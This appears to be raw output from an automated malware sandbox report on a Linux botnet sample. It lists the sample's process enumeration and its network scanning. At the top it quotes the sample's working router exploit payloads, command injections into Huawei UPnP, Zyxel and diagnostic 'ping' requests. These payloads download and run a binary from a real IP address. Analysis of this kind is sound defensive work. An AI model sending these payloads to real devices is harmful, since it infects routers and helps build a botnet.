        Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://103.136.43.52/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
        Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.136.43.52 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://103.136.43.52/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
        Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://103.136.43.52/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
        Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://103.136.43.52/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh/dev/null
        Source: classification engineClassification label: mal92.spre.troj.lin@0/0@0/0
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1582/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/2033/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1612/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1579/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1699/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1335/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1698/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/2028/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1334/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1576/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/2025/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/910/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/912/fd
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/912/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/759/fd
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/759/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/517/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/918/fd
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/918/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1594/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1349/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1/fd
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1623/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/761/fd
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/761/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1622/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/884/fd
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/884/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1983/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/2038/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1344/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1465/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1586/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1860/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1463/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/800/fd
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/800/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/801/fd
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/801/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1629/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1627/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1900/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/491/fd
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/491/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/2050/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1877/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/772/fd
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/772/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1633/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1599/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1632/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/774/fd
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/774/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1477/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/654/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/896/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1476/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1872/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/2048/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/655/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1475/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/777/fd
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/777/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/656/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/657/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/658/fd
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/658/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/936/fd
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/936/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/419/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1639/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1638/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1809/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1494/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1890/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/2063/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/2062/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1888/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1886/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/420/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1489/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/785/fd
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/785/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1642/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/667/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/788/fd
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/788/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/789/fd
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/789/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1648/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/2078/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/2077/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/2074/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/670/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/793/fd
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/793/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1656/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1654/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/674/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/1532/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/675/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/796/fd
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/796/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/676/exe
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/797/fd
        Source: /tmp/qJlf2SjoW4 (PID: 6248)File opened: /proc/797/exe
        Source: /usr/bin/xfce4-session (PID: 6319)Rm executable: /usr/bin/rm -> rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: unknownNetwork traffic detected: HTTP traffic on port 43430 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 37452 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 40306 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 59744 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 53118 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 46802 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 54364 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 40306
        Source: unknownNetwork traffic detected: HTTP traffic on port 55878 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 54234 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 46486 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 44132 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 47106 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 46486
        Source: unknownNetwork traffic detected: HTTP traffic on port 51688 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 54234 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 54234 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 51688 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 38390 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45748 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45898 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 38390 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 54234 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 38390 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 51688 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 35320 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 35834 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45748 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45898 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 38390 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45748 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45898 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 51688 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45748 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45898 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33988 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 48884 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 38076 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 52070 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 58940 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 54786 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33580 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33580 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 51688 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33580 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45748 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 34822 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 56924 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 56924 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45898 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 56924 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33580 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 56924 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 35642 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 56572 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 34288 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 39336 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 39658 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 41018 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 33946 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 41308 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 40976 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 40976 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33580 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 40976 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 44980 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33828 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 46236 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 48576 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 53968 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 51688 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45748 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45898 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 40976 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 47334 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55574 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 46958 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 37024 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 47334 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 57702 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 47334 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 37024 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 57702 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 46958 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 47334 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 53716 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33478 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 41954 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 59972 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 37024 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 44536 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 59972 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 57702 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 59972 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 46958 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 44536 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 40976 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 43450 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 43450
        Source: unknownNetwork traffic detected: HTTP traffic on port 37024 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 39546 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 38124 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 42204 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 59972 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 44536 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 57702 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 46510 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 42268 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 36862 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 48256 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55260 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33580 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 36862
        Source: unknownNetwork traffic detected: HTTP traffic on port 46510 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 53788 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 46510 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55260 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 48256 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55186 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 47160 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 42906 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 44536 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 46958 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 53788 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 46510 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55260 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 48256 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 53788 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 37024 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 42268 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 60922 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 48256 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55260 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 60922 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 37608 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 60922 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55310 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 57702 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 47070 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 53788 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 44536 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55310 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 37608 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 47070 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 60922 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 37380 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 60828 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 40976 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55310 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 47070 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 37608 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 46958 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 33824 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 48256 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55310 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 55260 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 60798 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 47070 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 42268 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 51218 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 33824 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 51688 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 37608 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 45748 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 53788 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 51218 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 56372 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33824 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 51218 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 45898 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 37024 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55310 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 39434 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 53492 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33886 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33430 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 34734 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 54408 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 34734
        Source: unknownNetwork traffic detected: HTTP traffic on port 34088 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 51982 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 47070 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 51218 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 35140 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 53688 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 44870 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 44536 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45400 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 34088 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 39434 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 33824 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 37608 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 57702 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 34088 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 36554 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 57596 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 50844 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 50844
        Source: unknownNetwork traffic detected: HTTP traffic on port 36828 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 39434 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 48256 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55260 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33580 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 36828 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 34088 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 51218 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 60094 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 41474 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 60094
        Source: unknownNetwork traffic detected: HTTP traffic on port 39674 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55310 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 36828 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 49556 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 53788 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 59392 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 59392 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45474 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 59392 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 39434 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 42268 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33824 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 59392 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 46958 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 47070 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 34088 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 36828 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 43406 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 46416 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 60034 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 40976 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 60034 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 46304 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 60034 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 60034 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 37608 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 46416 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 51218 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 37358 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 39434 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 37024 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 36828 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 39748 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55164 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55800 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 51048 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 56836 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 34088 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 44536 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 51048 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 56836 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 55310 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 56836 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 51048 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 55682 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 57002 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 50424 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55260 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 48256 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33824 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 53412 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 51258 -> 52869
